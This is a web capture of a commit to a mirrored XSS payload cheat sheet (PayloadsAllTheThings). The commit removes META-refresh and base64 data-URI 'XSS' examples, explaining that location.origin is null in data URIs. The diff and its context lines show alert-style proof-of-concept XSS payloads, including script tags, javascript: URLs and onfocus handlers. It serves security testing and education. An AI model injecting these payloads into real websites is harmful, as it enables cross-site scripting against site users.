Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-07-05 18:01:35 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Fix fake xss

Browse Source 
Actually, is not XSS.

Running scripts like <a href="data:text/html,<script>alert(location.origin)</script>">clickme</a> have location.origin "null".
This commit is contained in:
Anton Lopanitsyn 2019-02-11 09:34:13 +03:00 committed by GitHub
parent f2273f5cce
commit 200a2d38d8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
XSS injection/README.md
View File

@ -122,18 +122,6 @@ you can also specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```
XSS in META tag
```javascript
Base64 encoded
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
With an additional URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
```
XSS in Hidden input
```javascript
@ -162,12 +150,6 @@ URL/<script>alert('XSS');//
URL/<input autofocus onfocus=alert(1)>
```
XSS using base64 encoded href data in a link
```
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
```
## XSS in wrappers javascript and data URI
XSS with javascript: